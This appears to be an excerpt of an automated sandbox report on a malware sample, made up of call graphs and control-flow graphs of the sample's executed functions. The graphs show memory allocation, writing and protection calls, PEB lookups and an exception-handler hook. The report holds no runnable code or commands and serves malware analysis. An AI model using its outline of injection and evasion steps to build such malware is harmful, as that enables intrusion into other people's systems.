9127->9229 9129 231e451 9326 2322ad2 9130->9326 9133 2322458 NtProtectVirtualMemory 9132->9133 9133->9048 9136 231fcc1 GetPEB 9135->9136 9156 231138e 9136->9156 9137 2321490 25 API calls 9137->9156 9138 231f4e4 LoadLibraryA 9140 231f533 9138->9140 9139 231fcc1 GetPEB 9141 231f4c2 9139->9141 9140->9048 9141->9138 9143 231bbfe 9145 2322acd 25 API calls 9143->9145 9144 231f3ee LoadLibraryA GetPEB 9144->9156 9146 231bc5f 9145->9146 9147 2322acd 25 API calls 9146->9147 9148 231bc72 9147->9148 9149 2322acd 25 API calls 9148->9149 9151 231bcba 9149->9151 9150 231bd4b 25 API calls 9150->9156 9151->9048 9151->9138 9151->9139 9152 2322acd 25 API calls 9152->9156 9153 231b695 9153->9143 9157 231b943 NtWriteVirtualMemory 9153->9157 9154 23214fe GetPEB 9154->9156 9155 23206a2 25 API calls 9155->9156 9156->9137 9156->9143 9156->9144 9156->9150 9156->9151 9156->9152 9156->9153 9156->9154 9156->9155 9158 23223e2 NtProtectVirtualMemory 9156->9158 9162 2311320 9156->9162 9164 232322b 25 API calls 9156->9164 9171 2321f4c 9156->9171 9172 232322b 25 API calls 9156->9172 9175 2322284 9156->9175 9176 23218ac 9156->9176 9370 231f3ca GetPEB 9156->9370 9159 231b9e1 9157->9159 9158->9156 9159->9143 9160 2322acd 25 API calls 9159->9160 9161 231ba4c 9160->9161 9161->9143 9163 2322acd 25 API calls 9161->9163 9162->9048 9165 231bb07 9163->9165 9164->9156 9165->9143 9166 231bb84 9165->9166 9166->9162 9167 2322acd 25 API calls 9166->9167 9168 231bbfa 9167->9168 9168->9048 9169 23223e2 NtProtectVirtualMemory 9170 23223db 9169->9170 9170->9048 9171->9162 9177 23223e2 NtProtectVirtualMemory 9171->9177 9174 2323190 RtlAddVectoredExceptionHandler 9172->9174 9173 23223e2 NtProtectVirtualMemory 9173->9162 9174->9156 9175->9169 9176->9173 9178 232216a 9177->9178 9178->9048 9205 231138e 9179->9205 9180 2321490 25 API calls 9180->9205 9181 231f4e4 LoadLibraryA 9183 231f533 9181->9183 9182 231fcc1 GetPEB 9184 231f4c2 9182->9184 9183->9048 9184->9181 9186 231bbfe 9187 2322acd 25 API calls 9186->9187 9188 231bc5f 9187->9188 9189 2322acd 25 API calls 9188->9189 9190 231bc72 9189->9190 9191 2322acd 25 API calls 9190->9191 9193 231bcba 9191->9193 9192 231bd4b 25 API calls 9192->9205 9193->9048 9193->9181 9193->9182 9194 2322acd 25 API calls 9194->9205 9195 231f3ee LoadLibraryA GetPEB 9195->9205 9196 231b695 9196->9186 9199 231b943 NtWriteVirtualMemory 9196->9199 9197 23214fe GetPEB 9197->9205 9198 23206a2 25 API calls 9198->9205 9201 231b9e1 9199->9201 9200 23223e2 NtProtectVirtualMemory 9200->9205 9201->9186 9203 2322acd 25 API calls 9201->9203 9202 2311320 9202->9048 9204 231ba4c 9203->9204 9204->9186 9206 2322acd 25 API calls 9204->9206 9205->9179 9205->9180 9205->9186 9205->9192 9205->9193 9205->9194 9205->9195 9205->9196 9205->9197 9205->9198 9205->9200 9205->9202 9207 232322b 25 API calls 9205->9207 9214 2321f4c 9205->9214 9215 2322284 9205->9215 9216 232322b 25 API calls 9205->9216 9219 23218ac 9205->9219 9371 231f3ca GetPEB 9205->9371 9208 231bb07 9206->9208 9207->9205 9208->9186 9209 231bb84 9208->9209 9209->9202 9210 2322acd 25 API calls 9209->9210 9211 231bbfa 9210->9211 9211->9048 9212 23223e2 NtProtectVirtualMemory 9213 23223db 9212->9213 9213->9048 9214->9202 9220 23223e2 NtProtectVirtualMemory 9214->9220 9215->9212 9218 2323190 RtlAddVectoredExceptionHandler 9216->9218 9217 23223e2 NtProtectVirtualMemory 9217->9202 9218->9205 9219->9217 9221 232216a 9220->9221 9221->9048 9222->9095 9224 231f46b 9223->9224 9225 231f4e4 LoadLibraryA 9224->9225 9226 231fcc1 GetPEB 9224->9226 9227 231f533 9225->9227 9228 231f4c2 9226->9228 9227->9095 9228->9225 9230 231bdb8 9229->9230 9245 231c88b 9230->9245 9232 231bdcf 9237 231bf10 9232->9237 9304 231be04 9232->9304 9236 231e672 9236->9236 9237->9236 9242 231e463 9237->9242 9314 231bf1c 9237->9314 9238 231f3ee 9239 231f4e4 LoadLibraryA 9238->9239 9240 231fcc1 GetPEB 9238->9240 9241 231f533 9239->9241 9244 231f4c2 9240->9244 9241->9129 9242->9238 9293 231c7b8 9242->9293 9296 231c02c 9242->9296 9244->9239 9246 231c8a6 9245->9246 9265 231bcba 9245->9265 9247 231f3ee 2 API calls 9246->9247 9246->9265 9252 231c9d5 9247->9252 9248 231f4e4 LoadLibraryA 9250 231f533 9248->9250 9249 231fcc1 GetPEB 9251 231f4c2 9249->9251 9250->9232 9251->9248 9254 231cb1e NtAllocateVirtualMemory 9252->9254 9276 231138e 9252->9276 9253 2321490 24 API calls 9253->9276 9254->9265 9257 2322acd 24 API calls 9257->9276 9258 231bbfe 9259 2322acd 24 API calls 9258->9259 9260 231bc5f 9259->9260 9261 2322acd 24 API calls 9260->9261 9262 231bc72 9261->9262 9263 2322acd 24 API calls 9262->9263 9263->9265 9264 231bd4b 24 API calls 9264->9276 9265->9232 9265->9248 9265->9249 9266 231f3ee LoadLibraryA GetPEB 9266->9276 9267 231b695 9267->9258 9270 231b943 NtWriteVirtualMemory 9267->9270 9268 23214fe GetPEB 9268->9276 9269 23206a2 24 API calls 9269->9276 9272 231b9e1 9270->9272 9271 23223e2 NtProtectVirtualMemory 9271->9276 9272->9258 9274 2322acd 24 API calls 9272->9274 9273 2311320 9273->9232 9275 231ba4c 9274->9275 9275->9258 9277 2322acd 24 API calls 9275->9277 9276->9253 9276->9257 9276->9258 9276->9264 9276->9265 9276->9266 9276->9267 9276->9268 9276->9269 9276->9271 9276->9273 9278 232322b 24 API calls 9276->9278 9285 2321f4c 9276->9285 9286 2322284 9276->9286 9287 23218ac 9276->9287 9288 232322b 24 API calls 9276->9288 9325 231f3ca GetPEB 9276->9325 9279 231bb07 9277->9279 9278->9276 9279->9258 9280 231bb84 9279->9280 9280->9273 9281 2322acd 24 API calls 9280->9281 9282 231bbfa 9281->9282 9282->9232 9283 23223e2 NtProtectVirtualMemory 9284 23223db 9283->9284 9284->9232 9285->9273 9291 23223e2 NtProtectVirtualMemory 9285->9291 9286->9283 9289 23223e2 NtProtectVirtualMemory 9287->9289 9290 2323190 RtlAddVectoredExceptionHandler 9288->9290 9289->9273 9290->9276 9292 232216a 9291->9292 9292->9232 9294 231c88b 29 API calls 9293->9294 9295 231c7f2 9294->9295 9295->9242 9297 231c098 9296->9297 9298 231c88b 28 API calls 9297->9298 9299 231c0d9 9298->9299 9299->9242 9300 231f4e4 LoadLibraryA 9299->9300 9301 231fcc1 GetPEB 9299->9301 9302 231f533 9300->9302 9303 231f4c2 9301->9303 9302->9242 9303->9300 9305 231c88b 28 API calls 9304->9305 9306 231be29 9305->9306 9307 231f3ee 9306->9307 9312 231c02c 28 API calls 9306->9312 9313 231c7b8 28 API calls 9306->9313 9308 231f4e4 LoadLibraryA 9307->9308 9309 231fcc1 GetPEB 9307->9309 9310 231f533 9308->9310 9311 231f4c2 9309->9311 9310->9237 9311->9308 9312->9306 9313->9306 9315 231bf75 9314->9315 9316 231f3ee 9315->9316 9317 231c88b 28 API calls 9315->9317 9318 231f4e4 LoadLibraryA 9316->9318 9319 231fcc1 GetPEB 9316->9319 9323 231bfe4 9317->9323 9320 231f533 9318->9320 9321 231f4c2 9319->9321 9320->9237 9321->9318 9322 231c02c 28 API calls 9322->9323 9323->9316 9323->9322 9324 231c7b8 28 API calls 9323->9324 9324->9323 9325->9276 9357 231138e 9326->9357 9327 23206a2 25 API calls 9327->9357 9328 23214fe GetPEB 9328->9357 9329 232322b 25 API calls 9329->9357 9330 23223e2 NtProtectVirtualMemory 9330->9357 9331 2321490 25 API calls 9331->9357 9332 232322b 25 API calls 9333 2323190 RtlAddVectoredExceptionHandler 9332->9333 9333->9357 9334 23223e2 NtProtectVirtualMemory 9335 23223db 9334->9335 9336 231f4e4 LoadLibraryA 9338 231f533 9336->9338 9337 231fcc1 GetPEB 9339 231f4c2 9337->9339 9339->9336 9340 2321f4c 9344 2311320 9340->9344 9346 23223e2 NtProtectVirtualMemory 9340->9346 9341 2322284 9341->9334 9343 23223e2 NtProtectVirtualMemory 9343->9344 9345 23218ac 9345->9343 9347 232216a 9346->9347 9348 231bbfe 9350 2322acd 25 API calls 9348->9350 9349 231f3ee LoadLibraryA GetPEB 9349->9357 9351 231bc5f 9350->9351 9352 2322acd 25 API calls 9351->9352 9353 231bc72 9352->9353 9354 2322acd 25 API calls 9353->9354 9356 231bcba 9354->9356 9355 231bd4b 25 API calls 9355->9357 9356->9336 9356->9337 9357->9326 9357->9327 9357->9328 9357->9329 9357->9330 9357->9331 9357->9332 9357->9340 9357->9341 9357->9344 9357->9345 9357->9348 9357->9349 9357->9355 9357->9356 9358 2322acd 25 API calls 9357->9358 9359 231b695 9357->9359 9369 231f3ca GetPEB 9357->9369 9358->9357 9359->9348 9360 231b943 NtWriteVirtualMemory 9359->9360 9361 231b9e1 9360->9361 9361->9348 9362 2322acd 25 API calls 9361->9362 9363 231ba4c 9362->9363 9363->9348 9364 2322acd 25 API calls 9363->9364 9365 231bb07 9364->9365 9365->9348 9366 231bb84 9365->9366 9366->9344 9367 2322acd 25 API calls 9366->9367 9368 231bbfa 9367->9368 9369->9357 9370->9156 9371->9205 9372 231c88b 9373 231c8a6 9372->9373 9392 231bcba 9372->9392 9374 231f3ee 2 API calls 9373->9374 9373->9392 9379 231c9d5 9374->9379 9375 231f4e4 LoadLibraryA 9377 231f533 9375->9377 9376 231fcc1 GetPEB 9378 231f4c2 9376->9378 9378->9375 9381 231cb1e NtAllocateVirtualMemory 9379->9381 9403 231138e 9379->9403 9380 2321490 24 API calls 9380->9403 9381->9392 9384 2322acd 24 API calls 9384->9403 9385 231bbfe 9386 2322acd 24 API calls 9385->9386 9387 231bc5f 9386->9387 9388 2322acd 24 API calls 9387->9388 9389 231bc72 9388->9389 9390 2322acd 24 API calls 9389->9390 9390->9392 9391 231bd4b 24 API calls 9391->9403 9392->9375 9392->9376 9393 231f3ee LoadLibraryA GetPEB 9393->9403 9394 231b695 9394->9385 9397 231b943 NtWriteVirtualMemory 9394->9397 9395 23214fe GetPEB 9395->9403 9396 23206a2 24 API calls 9396->9403 9399 231b9e1 9397->9399 9398 23223e2 NtProtectVirtualMemory 9398->9403 9399->9385 9401 2322acd 24 API calls 9399->9401 9400 2311320 9402 231ba4c 9401->9402 9402->9385 9404 2322acd 24 API calls 9402->9404 9403->9380 9403->9384 9403->9385 9403->9391 9403->9392 9403->9393 9403->9394 9403->9395 9403->9396 9403->9398 9403->9400 9405 232322b 24 API calls 9403->9405 9412 2321f4c 9403->9412 9413 2322284 9403->9413 9414 23218ac 9403->9414 9415 232322b 24 API calls 9403->9415 9420 231f3ca GetPEB 9403->9420 9406 231bb07 9404->9406 9405->9403 9406->9385 9407 231bb84 9406->9407 9407->9400 9408 2322acd 24 API calls 9407->9408 9409 231bbfa 9408->9409 9410 23223e2 NtProtectVirtualMemory 9411 23223db 9410->9411 9412->9400 9418 23223e2 NtProtectVirtualMemory 9412->9418 9413->9410 9416 23223e2 NtProtectVirtualMemory 9414->9416 9417 2323190 RtlAddVectoredExceptionHandler 9415->9417 9416->9400 9417->9403 9419 232216a 9418->9419 9420->9403

                                                                                                                          Executed Functions

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
                                                                                                                          • API String ID: 1029625771-3546614695
                                                                                                                          • Opcode ID: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
                                                                                                                          • Instruction ID: b4fe1132c84bbc538755cc38855f776d0f1566cd9ffb88bb36d9e2fd992d40d3
                                                                                                                          • Opcode Fuzzy Hash: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
                                                                                                                          • Instruction Fuzzy Hash: 37B2457160434ADFDF389E38CDA57DA77A2EF55390F95812ECC8A8B644D3348986CB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 375 23206a2-23206df call 231fcc1 378 231a574-231a80f call 2321490 call 231a760 375->378 379 23206e5-232073c 375->379 401 231a815-231a841 378->401 402 231f3ee-231f4b1 378->402 382 2320742-232074e 379->382 383 2323b58-2323bea call 231f0f7 379->383 385 232374d-2323755 382->385 390 2323756-232378f 385->390 390->390 393 2323791-23237e0 390->393 404 2311320-231136d call 23110c0 401->404 405 231a847-231a8fa 401->405 410 231f4b3-231f4e1 call 231fcc1 call 231f542 402->410 411 231f4e4-231f4e9 LoadLibraryA 402->411 405->385 413 231a900-231aac7 call 231f3ca call 2322acd 405->413 410->411 417 231f533-231f53d call 231f542 411->417 431 231aacd-231afd9 call 231f3ee call 2322acd call 231bd4b call 231f313 call 2322acd 413->431 432 231bbfe-231bd48 call 2322acd * 3 413->432 431->432 459 231afdf-231b089 431->459 432->402 459->402 461 231b08f-231b1e5 call 2322acd 459->461 461->404 466 231b1eb-231b20b 461->466 466->432 467 231b211-231b3f2 call 231b2fb 466->467 473 231b3f8-231b554 call 2322acd 467->473 474 231138e-2311464 call 23237e8 467->474 473->432 485 231b55a-231b597 473->485 483 2311466-2322adc 474->483 484 23114dd-2311502 474->484 490 2322add-2322b37 483->490 487 2311572-2311578 484->487 488 2311517-2311518 484->488 485->432 489 231b59d-231b604 485->489 491 2311579-2311594 487->491 488->487 495 231b641-231b64a 489->495 496 231b606-231b63b 489->496 490->474 497 2322b3d-2322d65 490->497 491->488 494 2311596-23115a6 491->494 498 23115b6-23115b9 494->498 499 23115a9-23115b4 494->499 495->378 500 231b650-231b66e 495->500 496->432 496->495 497->490 522 2322d6b-2322de9 call 23206a2 497->522 498->491 502 23115bb-23215f9 call 231f3ee * 2 call 23237e8 GetPEB call 23223e2 498->502 499->498 500->432 503 231b674-231b68f 500->503 540 2321df1-2321e3a 502->540 541 23215ff-23216a1 502->541 503->378 505 231b695-231b8b7 call 231f944 503->505 505->432 521 231b8bd-231b99b call 232374d NtWriteVirtualMemory 505->521 535 231b9e1-231b9ea 521->535 533 2322dec-2322dff 522->533 533->533 536 2322e01-2322e89 533->536 535->432 538 231b9f0-231baba call 2322acd 535->538 543 2322e8c-2322f06 536->543 538->432 552 231bac0-231bb82 call 2322acd 538->552 541->474 548 23216a7-2321838 541->548 550 2322f08-2322fe7 call 232322b 543->550 560 232183c-232184d 548->560 570 23231cc-2323231 550->570 571 2322fed-2323091 550->571 552->432 564 231bb84-231bbde 552->564 562 2321853-2321863 560->562 563 2321e40-2321e54 560->563 562->560 567 2321865-2321892 562->567 566 2321e58-2321e6d 563->566 564->385 569 231bbe4-231bbfd call 2322acd 564->569 572 2322172-2322187 566->572 573 2321e73-2321eac 566->573 567->560 574 2321894-23218aa 567->574 570->378 595 2323237-2323269 570->595 571->570 584 2323097-23230ad 571->584 572->474 575 232218d-232218e 572->575 573->566 579 2321eae-2321ec5 573->579 574->560 580 23218ac-2321920 574->580 582 2322192-23221a1 575->582 579->566 585 2321ec7-2321f29 579->585 586 2321922-232199c 580->586 587 23223b6-23223dd call 23223e2 582->587 588 23221a7-2322219 582->588 584->570 590 23230b3-23230ca 584->590 585->566 592 2321f2f-2321f46 585->592 601 23219a2-23219e7 586->601 602 2321a39-2321a4c 586->602 588->474 603 232221f-232222a 588->603 590->570 597 23230d0-2323102 590->597 592->474 600 2321f4c-2321fb8 592->600 595->570 604 232326f-23232f4 595->604 597->570 605 2323108-2323161 597->605 612 2321fbd-2321fd1 600->612 607 2321a69-2321a79 601->607 602->607 608 2321a4e-2321a68 602->608 603->582 609 2322230-2322244 603->609 604->570 616 23232fa-232332c 604->616 605->570 619 2323163-232317d 605->619 614 2321a7f-2321a96 607->614 615 2321c2d-2321c44 607->615 608->607 609->582 613 232224a-232227e 609->613 620 23220a7-23220e0 612->620 621 2321fd7-2321ff1 612->621 613->582 622 2322284-23222f0 613->622 614->615 623 2321a9c-2321b0e 614->623 617 2321d64-2321da8 615->617 618 2321c4a-2321cd0 615->618 616->570 624 2323332-2323335 616->624 617->586 629 2321dae-2321dec call 23223e2 617->629 618->617 633 2321cd6-2321d61 618->633 619->570 626 232317f-23231ab call 232322b RtlAddVectoredExceptionHandler 619->626 620->612 632 23220e6-232216c call 23223e2 620->632 627 2321ff3-232200a 621->627 628 232201c-2322084 621->628 638 23222f5-232230e 622->638 639 2321b0f-2321b3f 623->639 648 23231b0-23231b8 626->648 627->404 635 2322010-232201a 627->635 628->620 629->540 633->617 635->628 643 2322088-23220a6 635->643 644 2322310-232237a 638->644 645 232237b-23223ae 638->645 639->639 646 2321b41-2321bdb 639->646 643->620 644->645 645->638 651 23223b4 645->651 646->639 655 2321be1-2321c20 646->655 648->648 653 23231ba-23231c6 648->653 651->587 653->570 655->639 656 2321c26-2321c2a 655->656 656->615
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ";Jm$H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 0-2571250244
                                                                                                                          • Opcode ID: bf261497893e39f3039709f5d46a258c7f0e38190c55d119bc3c0cff89927007
                                                                                                                          • Instruction ID: ad64a07d2f1797803a65e1e2422d6949192abd30e2a7b73673712200b60521da
                                                                                                                          • Opcode Fuzzy Hash: bf261497893e39f3039709f5d46a258c7f0e38190c55d119bc3c0cff89927007
                                                                                                                          • Instruction Fuzzy Hash: 25A265716043499FDF389E38CDA57DA7BA2FF55350F55822EDC8A8B644D3348986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 1029625771-1197094480
                                                                                                                          • Opcode ID: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
                                                                                                                          • Instruction ID: 7b851b94cb1fc747ade07a039588149bb390205655d6c55e48879a5e1097045d
                                                                                                                          • Opcode Fuzzy Hash: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
                                                                                                                          • Instruction Fuzzy Hash: 85C2587160434A9FDF389E38CDA57DE77A6EF55390F95812ECC8A8B644D7308986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 978 232322b-2323231 979 231a574-231a80f call 2321490 call 231a760 978->979 980 2323237-2323269 978->980 995 231a815-231a841 979->995 996 231f3ee-231f4b1 979->996 981 232326f-23232f4 980->981 982 23231cc-2323222 980->982 981->982 987 23232fa-232332c 981->987 982->978 987->982 990 2323332-2323335 987->990 997 2311320-231136d call 23110c0 995->997 998 231a847-231a8fa 995->998 1002 231f4b3-231f4e1 call 231fcc1 call 231f542 996->1002 1003 231f4e4-231f4e9 LoadLibraryA 996->1003 1004 231a900-231aac7 call 231f3ca call 2322acd 998->1004 1005 232374d-2323755 998->1005 1002->1003 1008 231f533-231f53d call 231f542 1003->1008 1024 231aacd-231afd9 call 231f3ee call 2322acd call 231bd4b call 231f313 call 2322acd 1004->1024 1025 231bbfe-231bd48 call 2322acd * 3 1004->1025 1013 2323756-232378f 1005->1013 1013->1013 1017 2323791-23237e0 1013->1017 1024->1025 1052 231afdf-231b089 1024->1052 1025->996 1052->996 1054 231b08f-231b1e5 call 2322acd 1052->1054 1054->997 1059 231b1eb-231b20b 1054->1059 1059->1025 1060 231b211-231b3f2 call 231b2fb 1059->1060 1066 231b3f8-231b554 call 2322acd 1060->1066 1067 231138e-2311464 call 23237e8 1060->1067 1066->1025 1078 231b55a-231b597 1066->1078 1076 2311466-2322adc 1067->1076 1077 23114dd-2311502 1067->1077 1083 2322add-2322b37 1076->1083 1080 2311572-2311578 1077->1080 1081 2311517-2311518 1077->1081 1078->1025 1082 231b59d-231b604 1078->1082 1084 2311579-2311594 1080->1084 1081->1080 1088 231b641-231b64a 1082->1088 1089 231b606-231b63b 1082->1089 1083->1067 1090 2322b3d-2322d65 1083->1090 1084->1081 1087 2311596-23115a6 1084->1087 1091 23115b6-23115b9 1087->1091 1092 23115a9-23115b4 1087->1092 1088->979 1093 231b650-231b66e 1088->1093 1089->1025 1089->1088 1090->1083 1115 2322d6b-2322de9 call 23206a2 1090->1115 1091->1084 1095 23115bb-23215f9 call 231f3ee * 2 call 23237e8 GetPEB call 23223e2 1091->1095 1092->1091 1093->1025 1096 231b674-231b68f 1093->1096 1133 2321df1-2321e3a 1095->1133 1134 23215ff-23216a1 1095->1134 1096->979 1098 231b695-231b815 1096->1098 1107 231b85f-231b884 call 231f944 1098->1107 1111 231b889-231b8b7 1107->1111 1111->1025 1114 231b8bd-231b93e call 232374d 1111->1114 1124 231b943-231b99b NtWriteVirtualMemory 1114->1124 1126 2322dec-2322dff 1115->1126 1128 231b9e1-231b9ea 1124->1128 1126->1126 1129 2322e01-2322e89 1126->1129 1128->1025 1131 231b9f0-231baba call 2322acd 1128->1131 1136 2322e8c-2322f06 1129->1136 1131->1025 1145 231bac0-231bb82 call 2322acd 1131->1145 1134->1067 1141 23216a7-2321838 1134->1141 1143 2322f08-2322fe7 call 232322b 1136->1143 1153 232183c-232184d 1141->1153 1143->982 1163 2322fed-2323091 1143->1163 1145->1025 1157 231bb84-231bbde 1145->1157 1155 2321853-2321863 1153->1155 1156 2321e40-2321e54 1153->1156 1155->1153 1160 2321865-2321892 1155->1160 1159 2321e58-2321e6d 1156->1159 1157->1005 1162 231bbe4-231bbfd call 2322acd 1157->1162 1164 2322172-2322187 1159->1164 1165 2321e73-2321eac 1159->1165 1160->1153 1166 2321894-23218aa 1160->1166 1163->982 1175 2323097-23230ad 1163->1175 1164->1067 1167 232218d-232218e 1164->1167 1165->1159 1170 2321eae-2321ec5 1165->1170 1166->1153 1171 23218ac-2321920 1166->1171 1173 2322192-23221a1 1167->1173 1170->1159 1176 2321ec7-2321f29 1170->1176 1177 2321922-232199c 1171->1177 1178 23223b6-23223dd call 23223e2 1173->1178 1179 23221a7-2322219 1173->1179 1175->982 1180 23230b3-23230ca 1175->1180 1176->1159 1182 2321f2f-2321f46 1176->1182 1190 23219a2-23219e7 1177->1190 1191 2321a39-2321a4c 1177->1191 1179->1067 1192 232221f-232222a 1179->1192 1180->982 1186 23230d0-2323102 1180->1186 1182->1067 1189 2321f4c-2321fb8 1182->1189 1186->982 1193 2323108-2323161 1186->1193 1199 2321fbd-2321fd1 1189->1199 1195 2321a69-2321a79 1190->1195 1191->1195 1196 2321a4e-2321a68 1191->1196 1192->1173 1197 2322230-2322244 1192->1197 1193->982 1205 2323163-232317d 1193->1205 1201 2321a7f-2321a96 1195->1201 1202 2321c2d-2321c44 1195->1202 1196->1195 1197->1173 1200 232224a-232227e 1197->1200 1206 23220a7-23220e0 1199->1206 1207 2321fd7-2321ff1 1199->1207 1200->1173 1208 2322284-23222f0 1200->1208 1201->1202 1209 2321a9c-2321b0e 1201->1209 1203 2321d64-2321da8 1202->1203 1204 2321c4a-2321cd0 1202->1204 1203->1177 1214 2321dae-2321dec call 23223e2 1203->1214 1204->1203 1218 2321cd6-2321d61 1204->1218 1205->982 1211 232317f-232318b call 232322b 1205->1211 1206->1199 1217 23220e6-232216c call 23223e2 1206->1217 1212 2321ff3-232200a 1207->1212 1213 232201c-2322084 1207->1213 1223 23222f5-232230e 1208->1223 1224 2321b0f-2321b3f 1209->1224 1227 2323190-23231ab RtlAddVectoredExceptionHandler 1211->1227 1212->997 1220 2322010-232201a 1212->1220 1213->1206 1214->1133 1218->1203 1220->1213 1228 2322088-23220a6 1220->1228 1229 2322310-232237a 1223->1229 1230 232237b-23223ae 1223->1230 1224->1224 1231 2321b41-2321bdb 1224->1231 1233 23231b0-23231b8 1227->1233 1228->1206 1229->1230 1230->1223 1236 23223b4 1230->1236 1231->1224 1240 2321be1-2321c20 1231->1240 1233->1233 1238 23231ba-23231c6 1233->1238 1236->1178 1238->982 1240->1224 1241 2321c26-2321c2a 1240->1241 1241->1202
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Offset: 02310000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2310000_Zr26f1rL6r.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: H+m$U=b$}#c
                                                                                                                          • API String ID: 0-2772983987
                                                                                                                          • Opcode ID: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
                                                                                                                          • Instruction ID: fc311f0b3637a19052863c02981e271f087ca8da113988a971a2a777995a1f84
                                                                                                                          • Opcode Fuzzy Hash: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
                                                                                                                          • Instruction Fuzzy Hash: BD82327160434A9FDF349E38CDA53EE7BA2EF55390F95822EDC8A8B654D3348585CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1242 2322ad2-2322adc 1243 2322add-2322b37 1242->1243 1245 231138e-2311464 call 23237e8 1243->1245 1246 2322b3d-2322d65 1243->1246 1255 2311466-2311497 1245->1255 1256 23114dd-2311502 1245->1256 1246->1243 1264 2322d6b-2322de9 call 23206a2 1246->1264 1255->1242 1258 2311572-2311578 1256->1258 1259 2311517-2311518 1256->1259 1261 2311579-2311594 1258->1261 1259->1258 1261->1259 1263 2311596-23115a6 1261->1263 1265 23115b6-23115b9 1263->1265 1266 23115a9-23115b4 1263->1266 1271 2322dec-2322dff 1264->1271 1265->1261 1268 23115bb-23215f9 call 231f3ee * 2 call 23237e8 GetPEB call 23223e2 1265->1268 1266->1265 1292 2321df1-2321e3a 1268->1292 1293 23215ff-23216a1 1268->1293 1271->1271 1273 2322e01-2322e89 1271->1273 1277 2322e8c-2322f06 1273->1277 1281 2322f08-2322fe7 call 232322b 1277->1281 1294 23231cc-2323231 1281->1294 1295 2322fed-2323091 1281->1295 1293->1245 1300 23216a7-2321838 1293->1300 1305 231a574-231a80f call 2321490 call 231a760 1294->1305 1306 2323237-2323269 1294->1306 1295->1294 1301 2323097-23230ad 1295->1301 1315 232183c-232184d 1300->1315 1301->1294 1304 23230b3-23230ca 1301->1304 1304->1294 1308 23230d0-2323102 1304->1308 1351 231a815-231a841 1305->1351 1352 231f3ee-231f4b1 1305->1352 1306->1294 1310 232326f-23232f4 1306->1310 1308->1294 1313 2323108-2323161 1308->1313 1310->1294 1318 23232fa-232332c 1310->1318 1313->1294 1323 2323163-232317d 1313->1323 1319 2321853-2321863 1315->1319 1320 2321e40-2321e54 1315->1320 1318->1294 1324 2323332-2323335 1318->1324 1319->1315 1326 2321865-2321892 1319->1326 1325 2321e58-2321e6d 1320->1325 1323->1294 1328 232317f-23231ab call 232322b RtlAddVectoredExceptionHandler 1323->1328 1329 2322172-2322187 1325->1329 1330 2321e73-2321eac 1325->1330 1326->1315 1331 2321894-23218aa 1326->1331 1346 23231b0-23231b8 1328->1346 1329->1245 1332 232218d-232218e 1329->1332 1330->1325 1335 2321eae-2321ec5 1330->1335 1331->1315 1336 23218ac-2321920 1331->1336 1338 2322192-23221a1 1332->1338 1335->1325 1341 2321ec7-2321f29 1335->1341 1342 2321922-232199c 1336->1342 1343 23223b6-23223dd call 23223e2 1338->1343 1344 23221a7-2322219 1338->1344 1341->1325 1348 2321f2f-2321f46 1341->1348 1357 23219a2-23219e7 1342->1357 1358 2321a39-2321a4c 1342->1358 1344->1245 1359 232221f-232222a 1344->1359 1346->1346 1353 23231ba-23231c6 1346->1353 1348->1245 1356 2321f4c-2321fb8 1348->1356 1360 2311320-231136d call 23110c0 1351->1360 1361 231a847-231a8fa 1351->1361 1369 231f4b3-231f4e1 call 231fcc1 call 231f542 1352->1369 1370 231f4e4-231f53d LoadLibraryA call 231f542 1352->1370 1353->1294 1371 2321fbd-2321fd1 1356->1371 1364 2321a69-2321a79 1357->1364 1358->1364 1365 2321a4e-2321a68 1358->1365 1359->1338 1366 2322230-2322244 1359->1366 1375 231a900-231aac7 call 231f3ca call 2322acd 1361->1375 